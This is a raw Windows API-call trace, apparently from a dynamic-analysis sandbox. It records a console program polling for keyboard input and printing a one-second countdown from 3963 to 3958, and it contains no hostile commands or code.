[0122.251] GetFileType (hFile=0x4c) returned 0x2
[0122.251] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0122.251] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0122.251] lstrlenW (lpString="\x08\x08\x08\x083963") returned 8
[0122.252] GetConsoleOutputCP () returned 0x1b5
[0122.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083963", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0122.252] GetConsoleOutputCP () returned 0x1b5
[0122.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083963", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083963", lpUsedDefaultChar=0x0) returned 8
[0122.252] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0122.252] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0122.252] Sleep (dwMilliseconds=0x64)
[0122.360] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.360] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.360] Sleep (dwMilliseconds=0x64)
[0122.478] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.478] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.478] Sleep (dwMilliseconds=0x64)
[0122.578] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.578] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.578] Sleep (dwMilliseconds=0x64)
[0122.688] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.688] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.688] Sleep (dwMilliseconds=0x64)
[0122.797] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.797] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.797] Sleep (dwMilliseconds=0x64)
[0122.906] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.906] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.906] Sleep (dwMilliseconds=0x64)
[0123.015] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.015] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0123.015] Sleep (dwMilliseconds=0x64)
[0123.124] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.124] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0123.124] Sleep (dwMilliseconds=0x64)
[0123.233] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.234] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.234] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083962") returned 8
[0123.234] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0123.234] __iob_func () returned 0x757a2900
[0123.234] _fileno (_File=0x757a2920) returned 1
[0123.234] _errno () returned 0x5507d8
[0123.234] _get_osfhandle (_FileHandle=1) returned 0x4c
[0123.234] _errno () returned 0x5507d8
[0123.234] GetFileType (hFile=0x4c) returned 0x2
[0123.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0123.234] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0123.234] lstrlenW (lpString="\x08\x08\x08\x083962") returned 8
[0123.234] GetConsoleOutputCP () returned 0x1b5
[0123.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083962", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0123.234] GetConsoleOutputCP () returned 0x1b5
[0123.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083962", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083962", lpUsedDefaultChar=0x0) returned 8
[0123.235] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0123.235] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0123.235] Sleep (dwMilliseconds=0x64)
[0123.343] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.343] Sleep (dwMilliseconds=0x64)
[0123.452] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.452] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.452] Sleep (dwMilliseconds=0x64)
[0123.561] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.561] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.561] Sleep (dwMilliseconds=0x64)
[0123.670] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.670] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.670] Sleep (dwMilliseconds=0x64)
[0123.780] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.780] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.780] Sleep (dwMilliseconds=0x64)
[0123.889] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.889] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.889] Sleep (dwMilliseconds=0x64)
[0123.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0123.998] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0123.998] Sleep (dwMilliseconds=0x64)
[0124.107] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.107] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0124.107] Sleep (dwMilliseconds=0x64)
[0124.216] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.216] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd7
[0124.216] Sleep (dwMilliseconds=0x64)
[0124.325] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.326] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.326] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083961") returned 8
[0124.326] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0124.326] __iob_func () returned 0x757a2900
[0124.326] _fileno (_File=0x757a2920) returned 1
[0124.326] _errno () returned 0x5507d8
[0124.326] _get_osfhandle (_FileHandle=1) returned 0x4c
[0124.326] _errno () returned 0x5507d8
[0124.326] GetFileType (hFile=0x4c) returned 0x2
[0124.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0124.326] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0124.326] lstrlenW (lpString="\x08\x08\x08\x083961") returned 8
[0124.326] GetConsoleOutputCP () returned 0x1b5
[0124.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083961", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0124.326] GetConsoleOutputCP () returned 0x1b5
[0124.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083961", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083961", lpUsedDefaultChar=0x0) returned 8
[0124.326] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0124.326] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0124.326] Sleep (dwMilliseconds=0x64)
[0124.435] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.435] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.435] Sleep (dwMilliseconds=0x64)
[0124.544] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.544] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.544] Sleep (dwMilliseconds=0x64)
[0124.653] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.653] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.653] Sleep (dwMilliseconds=0x64)
[0124.762] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.762] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.762] Sleep (dwMilliseconds=0x64)
[0124.871] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.872] Sleep (dwMilliseconds=0x64)
[0124.988] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0124.988] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0124.988] Sleep (dwMilliseconds=0x64)
[0125.090] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.090] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0125.090] Sleep (dwMilliseconds=0x64)
[0125.199] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.199] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd8
[0125.199] Sleep (dwMilliseconds=0x64)
[0125.308] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.309] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.309] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083960") returned 8
[0125.309] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0125.309] __iob_func () returned 0x757a2900
[0125.309] _fileno (_File=0x757a2920) returned 1
[0125.309] _errno () returned 0x5507d8
[0125.309] _get_osfhandle (_FileHandle=1) returned 0x4c
[0125.309] _errno () returned 0x5507d8
[0125.309] GetFileType (hFile=0x4c) returned 0x2
[0125.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0125.309] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0125.309] lstrlenW (lpString="\x08\x08\x08\x083960") returned 8
[0125.309] GetConsoleOutputCP () returned 0x1b5
[0125.309] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083960", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0125.309] GetConsoleOutputCP () returned 0x1b5
[0125.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083960", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083960", lpUsedDefaultChar=0x0) returned 8
[0125.310] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0125.310] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0125.310] Sleep (dwMilliseconds=0x64)
[0125.417] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.418] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.418] Sleep (dwMilliseconds=0x64)
[0125.527] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.527] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.527] Sleep (dwMilliseconds=0x64)
[0125.636] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.636] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.636] Sleep (dwMilliseconds=0x64)
[0125.745] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.745] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.745] Sleep (dwMilliseconds=0x64)
[0125.854] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.854] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.854] Sleep (dwMilliseconds=0x64)
[0125.963] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0125.964] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0125.964] Sleep (dwMilliseconds=0x64)
[0126.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.073] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0126.073] Sleep (dwMilliseconds=0x64)
[0126.182] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.182] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd9
[0126.182] Sleep (dwMilliseconds=0x64)
[0126.291] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.291] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.291] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083959") returned 8
[0126.291] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0126.291] __iob_func () returned 0x757a2900
[0126.292] _fileno (_File=0x757a2920) returned 1
[0126.292] _errno () returned 0x5507d8
[0126.292] _get_osfhandle (_FileHandle=1) returned 0x4c
[0126.292] _errno () returned 0x5507d8
[0126.292] GetFileType (hFile=0x4c) returned 0x2
[0126.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0126.292] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0126.292] lstrlenW (lpString="\x08\x08\x08\x083959") returned 8
[0126.292] GetConsoleOutputCP () returned 0x1b5
[0126.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083959", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0126.292] GetConsoleOutputCP () returned 0x1b5
[0126.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083959", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083959", lpUsedDefaultChar=0x0) returned 8
[0126.292] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0126.292] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0126.292] Sleep (dwMilliseconds=0x64)
[0126.400] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.400] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.401] Sleep (dwMilliseconds=0x64)
[0126.509] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.509] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.509] Sleep (dwMilliseconds=0x64)
[0126.634] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.634] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.634] Sleep (dwMilliseconds=0x64)
[0126.743] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.743] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.743] Sleep (dwMilliseconds=0x64)
[0126.854] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.855] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.855] Sleep (dwMilliseconds=0x64)
[0126.970] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0126.970] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0126.970] Sleep (dwMilliseconds=0x64)
[0127.071] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.071] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0127.071] Sleep (dwMilliseconds=0x64)
[0127.181] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.182] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fda
[0127.182] Sleep (dwMilliseconds=0x64)
[0127.290] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.290] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdb
[0127.290] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083958") returned 8
[0127.290] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0127.290] __iob_func () returned 0x757a2900
[0127.290] _fileno (_File=0x757a2920) returned 1
[0127.290] _errno () returned 0x5507d8
[0127.290] _get_osfhandle (_FileHandle=1) returned 0x4c
[0127.290] _errno () returned 0x5507d8
[0127.290] GetFileType (hFile=0x4c) returned 0x2
[0127.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0127.290] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0127.290] lstrlenW (lpString="\x08\x08\x08\x083958") returned 8
[0127.291] GetConsoleOutputCP () returned 0x1b5
[0127.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083958", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0127.291] GetConsoleOutputCP () returned 0x1b5
[0127.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083958", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083958", lpUsedDefaultChar=0x0) returned 8
[0127.291] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0127.291] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0127.291] Sleep (dwMilliseconds=0x64)
[0127.476] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.477] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdb
[0127.477] Sleep (dwMilliseconds=0x64)
[0127.632] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.633] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdb
[0127.633] Sleep (dwMilliseconds=0x64)
[0127.789] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.789] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdb
[0127.789] Sleep (dwMilliseconds=0x64)
[0127.976] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0127.976] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdb
[0127.976] Sleep (dwMilliseconds=0x64)
[0128.163] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0128.163] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdb
[0128.163] Sleep (dwMilliseconds=0x64)
[0128.350] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
